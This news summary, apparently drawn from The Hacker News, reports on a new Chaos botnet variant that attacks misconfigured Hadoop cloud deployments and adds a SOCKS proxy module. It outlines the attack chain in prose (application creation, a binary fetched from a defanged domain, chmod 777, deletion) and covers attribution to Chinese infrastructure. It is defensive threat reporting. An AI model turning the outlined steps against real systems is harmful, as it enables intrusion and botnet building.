New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy
Chaos Botnet كتطور: فيرسيون جديدة كتستهدف البنية التحتية السحابية (Cloud) بـقدرات SOCKS Proxy
Chaos Botnet Evolves: New Variant Targets Cloud Infrastructure with SOCKS Proxy Capabilities
TL;DR
The notorious Chaos malware has evolved to target misconfigured cloud deployments, moving beyond its traditional focus on routers. A new variant identified by Darktrace features a SOCKS proxy module, signaling a shift toward monetizing compromised infrastructure as a proxy service while stripping away older SSH propagation methods.
Introduction
The threat landscape for cloud infrastructure is facing a new challenge as the Chaos malware—a cross-platform botnet first documented in late 2022—undergoes a significant structural transformation. Originally known for targeting edge devices and routers, recent telemetries indicate that Chaos is now aggressively pursuing misconfigured cloud environments, specifically targeting services like Apache Hadoop.
According to a recent report from Darktrace, this evolution marks a strategic shift in how the botnet expands its infrastructure and monetizes its victims.
From Routers to the Cloud
Chaos was first identified by Lumen Black Lotus Labs in September 2022. It was initially described as an evolution of the Kaiji malware, known for targeting Docker instances. While early versions of Chaos specialized in infecting Windows and Linux environments to launch DDoS attacks and mine cryptocurrency, the latest variant observed by Darktrace shows a refined focus.
In a recent attack caught by Darktrace honeypots, threat actors targeted a deliberately misconfigured Hadoop instance. The attack chain unfolded as follows:
- Initial Access: An HTTP request was sent to the Hadoop deployment to create a new application.
- Payload Delivery: The application embedded shell commands to pull a Chaos agent binary from the malicious domain
pan.tenire[.]com. - Persistence & Execution: The attackers modified file permissions (
chmod 777) to ensure execution and subsequently deleted the binary from the disk to minimize forensic footprints.
Technical Overhaul: The SOCKS Proxy Addition
The 64-bit ELF binary discovered in recent campaigns is not just a port of the old code; it is a restructured version of Chaos.
What’s New:
- SOCKS Proxy Feature: The most significant addition is a proxy module that allows attackers to funnel malicious traffic through the compromised host. This obscures the origin of secondary attacks and makes detection significantly more difficult for defenders.
- Refactored Code: Several functions previously inherited from the Kaiji malware have been rewritten or heavily refactored.
What’s Gone:
- Removed Propagation Methods: Interestingly, the developers have removed functions that previously allowed the malware to spread via SSH brute-forcing and the exploitation of router-specific vulnerabilities.
Attribution and Links to Known Groups
While the specific identity of the operators remains unconfirmed, researchers noted the presence of Chinese language characters and the use of China-based infrastructure.
Intriguingly, the delivery domain (pan.tenire[.]com) has a history. It was previously associated with the Chinese cybercrime group Silver Fox during "Operation Silk Lure" in October 2025 (as documented by Seqrite Labs). In that campaign, the infrastructure was used to deliver ValleyRAT malware via phishing.
The Shift to Proxy-as-a-Service
The inclusion of proxy capabilities suggests a broader trend in the botnet ecosystem. Threat actors are moving beyond simple DDoS-for-hire or cryptocurrency mining. By integrating SOCKS proxies, groups behind botnets like Chaos and AISURU can monetize their "zombie" networks by selling access to the infrastructure for other cybercrimes, effectively acting as a privacy layer for other attackers.
Conclusion
The evolution of Chaos demonstrates that legacy botnets are not stagnant. They are being actively updated to exploit the most lucrative targets available: the cloud. As Darktrace noted, the shift from DDoS-centric features to proxy services highlights a growing risk where organizations' own infrastructure can be weaponized as an anonymization tool for global cybercrime.
Source: The Hacker News - New Chaos Variant Targets Misconfigured Cloud Deployments, Adds SOCKS Proxy
